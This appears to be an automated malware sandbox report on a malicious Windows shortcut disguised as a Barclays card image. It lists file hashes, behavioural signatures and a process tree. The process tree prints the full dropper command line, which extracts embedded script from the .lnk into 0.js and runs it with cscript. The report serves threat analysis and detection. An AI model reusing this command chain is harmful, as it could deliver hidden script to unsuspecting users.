Analysis
-
max time kernel
122s -
max time network
121s -
platform
windows7_x64 -
resource
win7-en-20211208 -
submitted
04-02-2022 08:32
Static task
static1
Behavioral task
behavioral1
Sample
24f7995ebb2eeb1b122232fda871acaa0eff9ba52f5dbe5423a0809c5b3d824e.lnk
Resource
win7-en-20211208
Behavioral task
behavioral2
Sample
24f7995ebb2eeb1b122232fda871acaa0eff9ba52f5dbe5423a0809c5b3d824e.lnk
Resource
win10v2004-en-20220113
General
-
Target
24f7995ebb2eeb1b122232fda871acaa0eff9ba52f5dbe5423a0809c5b3d824e.lnk
-
Size
83KB
-
MD5
85b2d96080c853c686f0b7b7284896a8
-
SHA1
db50fc4ea4f6c13fdbcd28ebe2f1cc44a74a83bf
-
SHA256
24f7995ebb2eeb1b122232fda871acaa0eff9ba52f5dbe5423a0809c5b3d824e
-
SHA512
9d419fb9406456937e92d57fc1b21f62cac1838082f6059924630edbefb5b568348553658565d59796d97b6078b28827abdb8c3c6eddb36800d0c78dcceff791
Malware Config
Signatures
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Suspicious use of WriteProcessMemory 18 IoCs
description pid Process procid_target PID 1608 wrote to memory of 1028 1608 cmd.exe 28 PID 1608 wrote to memory of 1028 1608 cmd.exe 28 PID 1608 wrote to memory of 1028 1608 cmd.exe 28 PID 1028 wrote to memory of 1348 1028 cmd.exe 29 PID 1028 wrote to memory of 1348 1028 cmd.exe 29 PID 1028 wrote to memory of 1348 1028 cmd.exe 29 PID 1028 wrote to memory of 1040 1028 cmd.exe 30 PID 1028 wrote to memory of 1040 1028 cmd.exe 30 PID 1028 wrote to memory of 1040 1028 cmd.exe 30 PID 1028 wrote to memory of 1272 1028 cmd.exe 31 PID 1028 wrote to memory of 1272 1028 cmd.exe 31 PID 1028 wrote to memory of 1272 1028 cmd.exe 31 PID 1028 wrote to memory of 1852 1028 cmd.exe 32 PID 1028 wrote to memory of 1852 1028 cmd.exe 32 PID 1028 wrote to memory of 1852 1028 cmd.exe 32 PID 1028 wrote to memory of 1628 1028 cmd.exe 33 PID 1028 wrote to memory of 1628 1028 cmd.exe 33 PID 1028 wrote to memory of 1628 1028 cmd.exe 33
Processes
-
C:\Windows\system32\cmd.execmd /c C:\Users\Admin\AppData\Local\Temp\24f7995ebb2eeb1b122232fda871acaa0eff9ba52f5dbe5423a0809c5b3d824e.lnk1⤵
- Suspicious use of WriteProcessMemory
PID:1608 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c path=C:\Windows\system32&&move "Barclays CC Back.jpg*lnk " "C:\Users\Admin\AppData\Local\Temp\1.lnk"&forfiles /P "C:\Users\Admin\AppData\Local\Temp" /M "Barc*.lnk" /S /D 0 /C "C:\Windows\system32\cmd.exe /c move @path C:\Users\Admin\AppData\Local\Temp\1.lnk"&type "C:\Users\Admin\AppData\Local\Temp\1.lnk"|find "RDE3">"C:\Users\Admin\AppData\Local\Temp\0.js"|rd a||cScrIPt "C:\Users\Admin\AppData\Local\Temp\0.js"2⤵
- Suspicious use of WriteProcessMemory
PID:1028 -
C:\Windows\system32\forfiles.exeforfiles /P "C:\Users\Admin\AppData\Local\Temp" /M "Barc*.lnk" /S /D 0 /C "C:\Windows\system32\cmd.exe /c move @path C:\Users\Admin\AppData\Local\Temp\1.lnk"3⤵PID:1348
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" type "C:\Users\Admin\AppData\Local\Temp\1.lnk""3⤵PID:1040
-
-
C:\Windows\system32\find.exefind "RDE3"3⤵PID:1272
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" rd a"3⤵PID:1852
-
-
C:\Windows\system32\cscript.execScrIPt "C:\Users\Admin\AppData\Local\Temp\0.js"3⤵PID:1628
-
-